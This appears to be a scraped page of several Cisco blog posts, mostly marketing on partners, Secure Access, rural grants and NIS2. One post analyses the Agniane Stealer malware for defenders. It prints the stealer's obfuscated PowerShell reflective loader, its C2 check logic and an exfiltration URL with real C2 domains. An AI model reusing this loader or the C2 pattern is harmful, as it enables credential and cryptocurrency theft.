About (Edit profile)

This author has not yet filled in any details.
So far has created 1829 blog entries.

Partner Competencies, Credentials Valued as Key Success Metrics by Customers Marc Surplus on February 20, 2024 at 4:00 pm

At Cisco, we pride ourselves on our world-class partner ecosystem, and we go to great lengths to recognize how our partners provide value to customers and support digital transformation. I encourage… Read more on Cisco Blogs

​[[{"value":"

At Cisco, we pride ourselves on our world-class partner ecosystem, and we go to great lengths to recognize how our partners provide value to customers and support digital transformation. I encourage you to read this new report from IDC:

Credentials, Proof of Competency Among Key Success Metrics for Customers

While each customer was looking to solve a unique business need, all three weighed partners’ credentials and proof of competency as key success metrics. Partners’ global reach, time to value for solutions, and their ability to be an objective advisor to assist in decision-making were all important factors for customers.

Other key success metrics included:

Skills/capabilities validated by Cisco: Cisco specializations and certifications—like CCNA or CCIE—aren’t just important, they also provide customers with a sense of trust and competency in the partner’s staff.
Streamlined supply chain/procurement for Cisco products: Specializations are important to customers, but so is the ability of their partner of choice to advocate for themselves and their customers to ensure quicker speed of delivery.
IT staff augmentation/extension: For customers in smaller markets, where recruiting and retaining top IT talent is a challenge, having a trusted partner that understands their business and who can make recommendations based upon that knowledge is invaluable.
Broad and deep industry and technical knowledge: Partners gain experience with a solution across many customers, giving them invaluable insights.

“Gold status and certifications are identifiable. Those partners know what they’re talking about, and it shows the partner’s commitment to Cisco. Choosing a Cisco partner is also about the intangibles of what that partner can do for me.”
– Cisco Customer

Holding Cisco Partners to High Standards

We hold our partners to high standards with our rigorous specializations, and customers consistently tell us that credentials are a critical consideration when choosing a partner. In fact, all three customers interviewed by IDC cited a partner’s certification and program status as one of the top reasons why they chose to work with that partner.

These customers also found that the partners’ close relationship with Cisco accelerated time to value throughout the solution lifecycle and streamlined supply chain and procurement of Cisco products. The partners in this report, by working so closely with both Cisco and the customer, demonstrated how we truly are greater together

I know our partner ecosystem is best in class, but don’t take my word for it. Read the report to hear all of the reasons these customers choose to work with Cisco partners.

Read Cisco Partner Value: The End-Customer Viewpoint now

Learn more about the Cisco Partner Program

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with #CiscoPartners on social!

Cisco Partners Facebook  |  @CiscoPartners X/Twitter  |  Cisco Partners LinkedIn

Share

"}]]  At Cisco, we pride ourselves on our world-class partner ecosystem, and we go to great lengths to recognize how our partners provide value to customers and support digital transformation. I encourage you to read this new report from IDC.  Read More Cisco Blogs 

By |2024-02-20T22:52:11+00:00February 20, 2024|Cisco: Learning|0 Comments

Cisco Secure Access Accelerates SSE Innovation with AI, User Experience Monitoring, and Identity Intelligence Jeff Scheaffer on February 19, 2024 at 1:00 pm

In a blog post last December, I said that the business and IT leaders with whom I meet always ask: How can I secure my highly distributed workforce, who gets more varied and decentralized all the… Read more on Cisco Blogs

​[[{"value":"

In a blog post last December, I said that the business and IT leaders with whom I meet always ask: How can I secure my highly distributed workforce, who gets more varied and decentralized all the time? How do I provide tight security without burdening them or impeding business?  That hasn’t changed. This still drives conversations early and often.

Yet this is never in isolation. Their focus on improving end users’ experience sits right beside their need to make life easier for their IT and security teams. And of course, these leaders are intensely working to lower risk to the organization. Simply said, these leaders are saying that they want security that’s better for users, easier for IT, and safer for everyone. Yet, that simple statement hasn’t historically been easy to achieve.

In June 2023, we introduced Cisco Secure Access, a security service edge (SSE) solution that squarely answers these needs. And since June, we’ve continued to aggressively add functionality to deepen and extend the ways that you can improve end user experience, simplify security management for IT, and tighten security for everyone. Today, I’m thrilled to share capabilities that we announced at Cisco Live in Amsterdam just a few weeks ago.

AI for Security: Increase security and lower complexity 

We’re excited to announce the AI Assistant for Security in Secure Access. This is a generative AI capability that will simplify access policy creation by automatically converting conversational English prompts into security policies. It can take a multi-part prompt and create a sophisticated single policy. It can automatically break a complex prompt into multiple elements and create a set of recommended polices to cover an entire scenario. By default, the AI Assistant creates rules in a disabled state to ensure the administrator can tweak, test, and move rules to production only when they are ready to do so.

Security administrators no longer need to understand the policy engine, formatting, and nomenclature for each security tool and manually create a large volume of policies. Using the AI Assistant in Secure Access, via the single console, security administrators can save significant time across policy creation and management tasks. Additionally, multi-person administrator groups can create a more consistent and effective policy set. And, all this pushes the needle on improved operational efficiency and reduced complexity.

Security for AI: Mitigate risks of using generative AI applications

My comments above highlight how Secure Access is using AI to enrich the security capability it provides. In addition, we announced our ability to help organizations safely use generative AI applications within their organizations to increase employee productivity without adding security risk.

Secure Access AI Data Loss Prevention (DLP) functionality secures the use of Generative AI applications via discovery, block/allow, granular control, and inline data loss prevention.

Functionality includes:

Discover and control use of 70 generative AI apps, including Bing AI, Google Bard, and ChatGPT — who’s trying to use it, how frequently, and where.
Block or allow multiple generative AI applications.
Enable the safe use of ChatGPT:
Granularly control which functions to allow — or not — and by whom.
Use DLP to ensure sensitive data is not leaked to the AI platform.
Use DLP to block the download of unsafe content from ChatGPT and notify the user.

Policy management for both inline and out-of-band DLP is done via Secure Access’s single, unified dashboard, so while it’s tightening security, it’s also keeping things simple for the IT/security staff.

Experience insights increases user productivity and IT efficiency

Experience Insights is a set of digital experience monitoring (DEM) capabilities that enables IT/security teams to improve user productivity by quickly revealing connectivity issues and providing the relevant details for faster resolution. It is embedded into Cisco Secure Access and powered by ThousandEyes functionality — at no extra cost — to enable rapid root cause identification and resolution.

Experience Insights monitors the health of work-managed endpoints, their underlay and overlay connectivity, and the application performance of top SaaS applications, such as collaboration and productivity platforms.

Example Insights:

Endpoint performance: CPU, memory, Wi-Fi
Network performance: Endpoint to Secure Access to target destination, including local network, user last mile, Internet, and application network
Application performance for top SaaS apps, such as Microsoft Office, Salesforce, Gmail, and Notion
Collaboration performance scores per user for Cisco Webex, Zoom, and Microsoft Teams
View user-specific events based on conditions, such as policy block

Because it is a component of Cisco Secure Access, administrators have a single correlated view to manage the connectivity, security, and digital experiences of their workforce — regardless of where users or issues are located — to reduce mean-time-to-response (MTTR). This improves user satisfaction and makes administrators, help desk staff, and end users more productive.

Experience Insights can be easily expanded to full ThousandEyes licenses with an extended set of monitoring capabilities and data sharing.

Identity Intelligence sharpens security

In the last year, we’ve seen an upsurge in identity threats that hit many enterprises hard. In light of that, Cisco security is making identity central to its security strategy. We are pioneering new identity intelligence that is all about understanding and managing not only the who and what of access, but also the when, where, and how of interactions.

Today, there is blind trust between authentication and access — a blank space where you can’t easily see and respond to identity behaviors. By closing that space, we’ll be able to move from asking, “CAN the user get access to resource X?” to the more important question, “SHOULD the user get access based on current identity intelligence?”

In mid-2024, Secure Access will be using this deep Identity Intelligence to make smarter zero trust access decisions, empowering security teams to defend against identity-based attacks. For example, Secure Access will be able to use data from existing identity and access management tools to enable administrators to clean up unused and vulnerable identities that leave a door cracked open for account takeover threats.

Identity Intelligence in Secure Access will expose subtle shifts in identity posture by aggregating extended attributes and user behavior factors from a wide range of Cisco and third-party sources. This will give a clear picture of every identity and continuously track changes that empower administrators to create and enforce sophisticated Secure Access policies.

This rich identity intelligence will allow your security team to block or challenge unusual identity behaviors based on risk. This could then initiate an incremental reduction in access rights or full session termination, quickly containing the impacts of a compromised identity.

Infuse ISE’s identity-based context into Secure Access

The integration of Identity Services Engine (ISE) into Secure Access’s VPNaaS capability is the first instantiation of ISE integration across Secure Access that will provide granular, identity-based, posture information to deepen visibility into what users are doing, when, and how.

It will enable the administrator to use detailed, identity-based information to make proactive governance decisions (via policy). For example, you can know — on a per user basis — the device type used, its location, its state/posture, is it managed or unmanaged, what’s the time of day, and more. In the future, by using AI analytics, Secure Access will be able to detect anomalies in device posture and identity and then apply the correct policy.

The upshot? You will be able to more precisely enforce the right policy, for the right user or device, at the right time.

This is just the beginning. Cisco is driving toward common identity across products and capabilities, applied wherever users work, however they connect (wired or wireless), and whatever resources they access.

Why Cisco?

Scale matters in security, and Cisco has a proven track record with cloud-delivered security solutions. We have over 70 thousand cloud security customers, manage 220 million remote endpoints, and secure over 600 billion web requests per day. We know how to do security at scale. To learn more, register to see a live demo of Cisco Secure Access.

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

InstagramFacebookTwitterLinkedIn

Share

"}]]  We're improving Cisco Secure Access by adding functionality that improves end user experience, simplifies security management for IT and tightens security.  Read More Cisco Blogs 

By |2024-02-19T22:50:14+00:00February 19, 2024|Cisco: Learning|0 Comments

Time to Leverage the USDA’s Distance Learning and Telemedicine Program Jen Messinger on February 19, 2024 at 2:00 pm

Have you heard about the USDA’s Distance Learning and Telemedicine (DLT) program? In 2023 the U.S. Congress appropriated $60 million to DLT for use by organizations that provide education and h… Read more on Cisco Blogs

​[[{"value":"

Have you heard about the USDA’s Distance Learning and Telemedicine (DLT) program? In 2023 the U.S. Congress appropriated $60 million to DLT for use by organizations that provide education and healthcare services to communities in rural areas. According to the USDA, this funding is provided to help rural communities connect with each other and beyond as they seek to overcome the impacts of their remote locations and low populations.

To help you learn more about the USDA’s DLT program, you’re invited to watch our recent webinar on Empowering Rural Communities through Distance Learning and Telemedicine (DLT) where we explore the opportunities DLT holds for your organization.

“I wrote my first DLT application in 1998 to build distance learning capabilities in the rural area where I live. In the early 2000s, our family was directly impacted by the life-saving power of telemedicine made possible by DLT. It is a program that is very near and dear to my heart.”

—Jen Messinger, Public Funding Advisor

How the DLT program works for you

DLT enhances education services by:

Creating access to dual enrollment or early college curriculum.
Giving university or college educators the ability to reach their students at remote campuses.
Allowing school districts to collaborate with each other, share instructors, and increase student access to learning opportunities.

DLT enhances healthcare services in rural areas by:

Connecting rural hospitals to urbanized specialists in times of crisis.
Providing patients access to specialists from their location.
Enhancing the ability for healthcare professionals to access training and education specific to their job.
Ensuring remote patients have access to quality care.

How do you know if you’re project is a good fit for DLT?

If you have an upcoming project, there are two key questions you can ask to see if the DLT program might be the right choice for you:

First, is the project in a rural area?
Second, is there a high level of poverty?

DLT uses census data to assess rurality and poverty to ensure project benefits are going to rural areas. Additionally, the USDA assigns special considerations to geographies. Each year, the special considerations change, but in the past Tribal lands, Enterprise Zones, STEM, and Opioid Crisis Response have been areas of special consideration. The USDA hasn’t published 2024 guidance yet. When they do, you should be aware that it will include details on special considerations for 2024.

In general, there are a few things you can do to prepare for your journey, including:

Determine if your project is going to focus on education or healthcare (the USDA requires applicants to select a primary area of focus).
Talk to your partners about the disparities they are facing when delivering (or receiving) services in rural areas.
Review the DLT guidance and workbook to delegate action items with your team.
Identify the communities where you need to provide services.
Determine what technology you need to make the project and go for it.

Funding amount and timing

The DLT funds projects between $50,000 and $1,000,000. Applicants need to provide a 15% match. And it’s never too early to start preparing. In fact, now is the time to visit the USDA DLT site to learn about the application process, see past funded projects, and monitor the program for upcoming announcements. Although, as of today’s date, the program is closed it will have an application window in 2024.

Remember, we’re here to help!

We urge you to take advantage of our team’s public funding experts so you can maximize your opportunities. The Cisco Public Funding Office has years of experience in consulting with organizations that need to pursue grants for technology. It’s easy to connect with us and we’ll be glad to show you how we can support with DLT and other grants. And be sure to watch Empowering Rural Communities through Distance Learning and Telemedicine (DLT) today!

More resources

Cisco Public Funding Office
Cisco for State and Local Government
Cisco Solutions for Broadband

Share

"}]]  The USDA’s Distance Learning and Telemedicine (DLT) program was established in 2023 to help organizations provide education and healthcare services to communities in rural areas. The Cisco Public Funding Office helps these organizations explore DLT opportunities and pursue technology grants.  Read More Cisco Blogs 

By |2024-02-19T22:50:13+00:00February 19, 2024|Cisco: Learning|0 Comments

Fly to Amsterdam with the Cisco Store Anjana Iyer on February 16, 2024 at 7:20 pm

If you’ve ever visited the Cisco Store Tech Lab in San Jose, California, you’ve probably seen how seamlessly Cisco and our partners’ retail technology is integrated into the store. Now, how do we show… Read more on Cisco Blogs

​[[{"value":"

If you’ve ever visited the Cisco Store Tech Lab in San Jose, California, you’ve probably seen how seamlessly Cisco and our partners’ retail technology is integrated into the store. Now, how do we showcase that technology at our travel stores? The process is more efficient and streamlined than you might think, as we’ve just seen from our most recent show, Cisco Live EMEA 2024, held in Amsterdam from February 5-9.

Before the Event

Everything starts with the floor plan of the booth at the RAI Amsterdam Convention Center. Once we have that, I’ll start mapping out where all the store technology needs to go: we work with our partners to decide where to place their solutions to ensure they can work optimally.

For instance, we met with EVERYANGLE to determine what areas we want to monitor for footfall analytics, queue counting, and engagement zones. Cameras had to be placed in strategic locations to give us full coverage of the store.

Queue counting camera

Cogniac helped us figure out where to place our Meraki MV63 camera to have a clear view of specific T-shirts that were used in a demo in conjunction with Wipro VisionEDGE. When a shirt is picked up off the rack, the MV63 relays that information to Cogniac, and then Wipro VisionEDGE receives a trigger alert to change the screen next to the shirt to educate the customer about the product and explain how our products empower an inclusive future for all.

Before we ship out to Amsterdam, I’ll set up the technology we’re taking in a lab in San Jose to test that everything is functional. I had our equipment road-tested and packed into just three crates by mid-December (a month and a half before the show), and JLL Logistics helped us ship it all over to Amsterdam.

Arriving in Amsterdam

A few days before the start of Cisco Live, JLL delivered the crates to our booth at the RAI, and our team started unpacking and deploying the equipment. Since we had the map ready, placing everything where it needed to go was seamless. I gave the network team the placement of the switches, cameras, smart fitting rooms, and so on beforehand so they could run the proper electrical lines through the booth, and all we had to do once we arrived was plug everything in.

The Cisco Store Tech Lab

Technology Deployment and Store Operations

This is the first year we’re baselining the store’s power consumption, both at the San Jose store and at all our travel stores, with the help of CAE Labs’ WiserWatts. We plan to schedule our power at next year’s shows to compare energy and cost savings. It took a bit to figure out how to route the power for all the technology through the Meraki MT40s (smart power controllers that monitor and remotely control power). We deployed twelve MT40s for full coverage of the booth, and it took a few trips to the electronics store to get the right adapters, but now that we’ve done it once, it will be a lot easier globally. After that, Fidel (the store’s Merchandising Project Manager) helps us place all our Meraki cameras. Everything is online by the Saturday before the show starts, and then we do any last-minute configuring and deploying our digital signage playlists.

The technology makes it a lot easier for our store associates in their day-to-day functions. Meraki smart buttons were set up to allow the associates to change our digital signage (for instance, changing the screens to indicate that the store was closed) without requiring backend access. Our travel stores utilize temporary store associates, so the process of restocking merchandise was similarly simplified: all they had to do was input the product’s ID, and the corresponding electronic shelf label would flash in the back of house to indicate the item’s location.

Touring the Tech Lab

Now that the travel store and tech lab are set up, I review the tour schedule with Kaleigh (the Cisco Store and Tech Lab’s Program Manager) to make sure the flow of the tours is fluid. We had a tour scheduled for the Cisco Champions the day before the show started, so our rehearsals had to be completed in advance.

We’d set up what we like to call the Triforce of Wisdom, or our triangular tech wall, to display our technology to visitors. Fidel, Courtney (our Marketing Lead), and Anjana (our Product Marketing Specialist) had wired up the products, such as the Meraki MT40, VusionGroup’s SESimagotag electronic shelf labels, and so forth beforehand so visitors could see the technology in-person. Meraki just launched their new MV13 and MV33 smart cameras a few days ago, and tour attendees had the opportunity to gain a sneak peek into those products during the show.

The Triforce of Wisdom Tech Wall

And that’s it! Our set-up process has been streamlined in a way that allows our small team to have things up and running in a matter of a few days.

To learn more about the Cisco Store Tech Lab, come visit us in San Jose, California, or catch us at Cisco Live US in June. If you were able to stop by the store at Cisco Live EMEA, thanks for saying hello! Hope to see you next year.

Share

"}]]  Curious about what it takes for the Cisco Store to travel to Cisco Live EMEA? Read on to learn more!  Read More Cisco Blogs 

By |2024-02-17T06:51:12+00:00February 17, 2024|Cisco: Learning|0 Comments

Agniane Stealer: Information stealer targeting cryptocurrency users Adela Jezkova on February 16, 2024 at 1:00 pm

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have… Read more on Cisco Blogs

​[["value":"

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware’s architecture and communication.

We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.

The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.” Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.

Introduction

During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:

http[s]://<domain name>/book_[A-Z0-9]+-d+.zip

Once downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe). [4]

This enamed PowerShell was used to execute series of obfuscated commands.

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat’).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq)  if ($_CASH_OjmGK.StartsWith(‘:: @’)) $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; ; ;$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Length – 1; $i++) $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); ;$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line shown above performs the following actions:

Reads the content of the previously extracted BAT file (passbook.bat).
Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
Converted payload and static key from Base64 to a byte array.
XOR’d the payload using a static key.
Decompressed XOR’d payload using GZIP.
Invokes payload after reflectively loading it into memory.

To understand actions taken toward the objective, we reversed the payload.

Binary Analysis

The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.

After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.

As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.

Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.

The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.

Command and Control

The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is “13.” This time request was made to a URL labeled “test,” for instance.

WebClient wc = new WebClient();

urlData = wc.DownloadString(“https://trecube[.]com/test”);

If urlData == “13” 

list_of_active_c2.Add(“trecube[.]com”)

continue;

In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:

trecube[.]com

trecube13[.]ru

imitato23[.]store

wood100home[.]ru

For all these domains, the sample is calling for a test URL.

urlList = “https://trecube.com/“, “https://trecube13.ru/“, “https://imitato23.store/“, “https://wood100home.ru/

for domain in domainList:

WebClient wc = new WebClient();

urlData = wc.DownloadString(domain + “test”);

If urlData == “13” 

list_of_active_c2.Add(domain)

continue;

Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern getext?id= followed by an ID – a part of resources of the _CASH_78 file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*

Again, this is handled as previous checking string in the code. It is parsed/split by semicolon and a list of extensions is created in a list of variables in C# code.

The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.

Subsequently, the malware requests a remote json file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67

And here what its corresponding output looks like:

“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a “getext” pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,

ru-RU

kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the “local application data” folder,

C:Users[user]AppDataLocal[A-Z0-9]32

Below is the structure/content of this archive file

Agniane Stealer.txt //added as attachement here

Installe Apps.txt //added as attachement here

PC Information.txt //added as attachement here

Files from Desktop //FOLDER – contains exfiltrated files from Desktop folder

Files from … //FOLDER – contains exfiltrated files from …

… //and other folders, which contain exfiltrated files.

It is later uploaded to

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer’s C2 communication,

The C2 communication protocol.

Other TTPs

The Agniane Stealer was also seen performing following actions:

Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for installed applications, it also collects this information.
Checking for a public IP on a ip-api.com, i.e,
https://ip-api.com/json/?fields=11827
Dumping Bitcoin and other cryptocurrency wallets
Performing (not well) checks to see if it’s running in a debugged or virtual env. etc.
Collecting wallet.dat files.
Enumerating Profile and User data.
Collecting stored credit cards.
Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM/debug techniques. It exhibits common behavior for stealers such as collecting and exfiltrating files, credentials password, credit card details, wallets, etc. Its evasive nature and targeting of various information might attract more adversaries in future to leverage its services.

Kill Chain

Kill Chain
Activity
TTP
Weaponization
Use of PowerShell, ZIP file, batch file
T1059.005
T1059.001
Delivery
ZIP file downloaded by the browser
T1204.002
Use of compromised websites
T1584.004
Exploitation
Running Obfuscated PowerShell payload
T1059.001
T1027.010
PowerShell decrypts payload using XOR and decompress using Gunzip
T1140
T1059.001
Reflective loading of the payload through Powershell
T1059.001
T1204.002
T1620
Use of Renamed PowerShell
T1036.003
Installation

Command and Control

Actions on Objectives
Collection of various information from the host
T1119
Targeting of credentials
T1555

Indicators of Compromise

Type
Stage
IOC (indicators of compromise)
File Hash
Delivery
5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash
Delivery
e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash
Delivery
b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain
C2
trecube[.]com
Domain
C2
trecube[.]store
Domain
C2
trecube13[.]ru
Domain
C2
imitato23[.]store
Domain
C2
wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

InstagramFacebookTwitterLinkedIn

Share

"]]  Agniane Stealer is a malware that targets credentials and documents, actively sold on Telegram, with ConfuserEX obfuscations, presents novel C2 protocol.  Read More Cisco Blogs 

By |2024-02-16T18:50:26+00:00February 16, 2024|Cisco: Learning|0 Comments

NIS2 compliance for industrial networks: Are you ready? Fabien Maisl on February 16, 2024 at 5:47 pm

Since the European Union (EU) signed the second version of the Network and Information Security (NIS2) Directive in December 2022, there has been a real frenzy all around Europe about it. NIS2 is now… Read more on Cisco Blogs

​[[{"value":"

Since the European Union (EU) signed the second version of the Network and Information Security (NIS2) Directive in December 2022, there has been a real frenzy all around Europe about it. NIS2 is now on top of the priority lists of most European Chief Information Security Officers (CISO). But do you know what it is? And most importantly, should you be concerned?

You probably have no choice but to comply with NIS2

The short answer is: Yes! If you work for an organization in an industry sector listed in the NIS2 Directive as critical for the resilience of the European economy, or are a supplier to any of these organizations, the NIS2 regulation should be on your agenda. It is designed to force industries across the EU to strengthen their cybersecurity practices and ensure their suppliers and service providers are not introducing any cyber risks to their operations.

The initial version of NIS voted in 2016 only affected a few critical European organizations. This second version is a completely different beast. Almost all organizations operating in most industry sectors must comply. And if you are found to be out of compliance, regulation authorities across member states can impose hefty financial penalties, and even name monitoring officers to oversee your cybersecurity strategy. For comprehensive details on which organizations must comply and the sanctions regime, read this white paper.

Industrial networks must enforce strong security controls 

But what does the NIS2 Directive mandate exactly? The comprehensive list of measures can be found in the same white paper, but if you run an industrial organization, here is what you should look for to ensure your operational technology (OT) infrastructure is compliant:

Deploy certified OT components. Your OT infrastructure is as strong as its weakest point. NIS2 requires you to ensure the OT devices you are deploying are not introducing cyber risks to your operations. Fortunately, the ISA/IEC 62443 Part 4-1 and Part 4-2 standards define what a secure OT asset is. All Cisco products are developed according to a lifecycle process which is Part 4-1 certified. Cisco industrial switches are certified for Part 4-2 compliance. Ask your networking vendors for their certifications.
Assess and prioritize OT cyber risks. Many organizations still don’t have a detailed inventory of what’s connected to their industrial network. NIS2 requires you to have visibility into your OT security posture so you can drive best practices. Cisco Cyber Vision automatically builds a comprehensive inventory of assets and their communications activities. It calculates risks scores to help you prioritize risks to be remediated. Unique in the industry, Cyber Vision also leverages scores from Cisco Vulnerability Management to prioritize vulnerabilities based on whether they are actively exploited in the field.
Implement zero-trust inside your network. Most industrial networks have grown to become large layer 2, flat networks. Malicious traffic can easily spread and compromise your entire operations. ISA/IEC 62443 Part 3-3 requires segmenting the network into small zones of trust where assets can communicate only with those they need to run the industrial process. Cyber Vision together with Cisco Identity Services Engine (ISE) can build these zero-trust segmentation policies and work with Cisco industrial network equipment to enforce them without the need for additional hardware.
Migrate to zero-trust remote access. Enabling vendors and contractors to remotely access industrial assets is critical to run operations. Cellular gateways that IT is not controlling are at odds with both OT and IT security requirements. VPNs have drawbacks of being always-on solutions with all-or-nothing access to all OT assets. Cyber Vision’s remote access reports list all these backdoors so that IT can take control back. Use Cisco Secure Equipment Access (SEA) to enable Zero-Trust Network Access (ZTNA) to your operational environments. SEA hides assets from discovery so remote users have access only to necessary devices, and restricts access to specific times. It enforces strong security controls such as multifactor authentication (MFA) and security posture checks, and it can record sessions for compliance and security audits.
